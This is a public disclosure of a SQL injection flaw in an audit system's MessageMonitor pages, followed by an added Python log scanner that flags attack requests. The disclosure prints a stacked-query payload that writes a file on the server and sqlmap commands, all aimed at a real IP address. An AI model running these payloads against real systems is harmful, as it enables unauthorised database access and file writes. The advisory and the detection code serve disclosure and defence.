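2015-12-17: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-01-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.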
As the title says.
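This is a SQL injection vulnerability, but because the system queries MySQL through PDO, multiple statements can be executed in one query, which makes it equivalent to arbitrary SQL statement execution. Files containing the vulnerability: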
/Customize/Audit/MessageMonitor/groupSearch.php?id=1
/Customize/Audit/MessageMonitor/mutilSearch.php?id=1
/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))
Executing a select statement to write a file to the server:
http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'%23
sqlmap test 1:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))*" --random-agent --dbms=mysql
sqlmap test 2:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs
A great many sites use this system; a few cases listed at random:
Filter the input.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)
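Added example (not part of the original report or the vendor's code): a check a defender can run over web access logs to find requests to the three files above whose id/uid value is not a plain integer, tagging the patterns seen in the proof of concept. The combined log format, the constructed sample lines and the names inspect_line and scan are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Endpoint -> injectable parameter, as named in the report.
ENDPOINTS = {
    "/Customize/Audit/MessageMonitor/groupSearch.php": "id",
    "/Customize/Audit/MessageMonitor/mutilSearch.php": "id",
    "/Customize/Audit/MessageMonitor/singleSearch.php": "uid",
}
# Assumption: combined-format access log; only client and request line are used.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Patterns taken from the report's proof of concept.
INDICATORS = {
    "stacked-statement": re.compile(r";"),
    "file-write": re.compile(r"into\s+(?:out|dump)file", re.I),
    "comment-terminator": re.compile(r"#|--\s|/\*"),
    "quote-or-paren": re.compile(r"['\"()]"),
}

def inspect_line(line):
    """Return (client, path, value, tags) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    target = m.group(2) if m else ""
    path, _, query = target.partition("?")
    param = ENDPOINTS.get(path)
    if param is None:
        return None
    # Split on '&' only: ';' must stay inside the value, not act as a separator.
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # %23 -> '#', %20 and '+' -> ' '
        if unquote_plus(key) == param and not re.fullmatch(r"\d{1,10}", value):
            tags = sorted(n for n, rx in INDICATORS.items() if rx.search(value))
            return m.group(1), path, value, tags or ["non-integer"]
    return None

def scan(lines):
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2016:10:00:01 +0800] "GET /Customize/Audit/MessageMonitor/groupSearch.php?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Jan/2016:10:00:05 +0800] "GET /Customize/Audit/MessageMonitor/groupSearch.php?id=1;select%200x776F6F79756E2E6F7267%20into%20outfile%20\'/tmp/wooyun.txt\'%23 HTTP/1.1" 200 0',
    '198.51.100.7 - - [28/Jan/2016:10:00:09 +0800] "GET /Customize/Audit/MessageMonitor/singleSearch.php?uid=1)) HTTP/1.1" 500 0',
    '192.0.2.11 - - [28/Jan/2016:10:00:12 +0800] "GET /index.php?id=1;x HTTP/1.1" 200 90',
]
if __name__ == "__main__":
    for client, path, value, tags in scan(SAMPLE_LOG):
        print(client, path, repr(value), ",".join(tags))
```

The same integer-only test on id and uid, applied before the value reaches the query, is the filtering the report recommends.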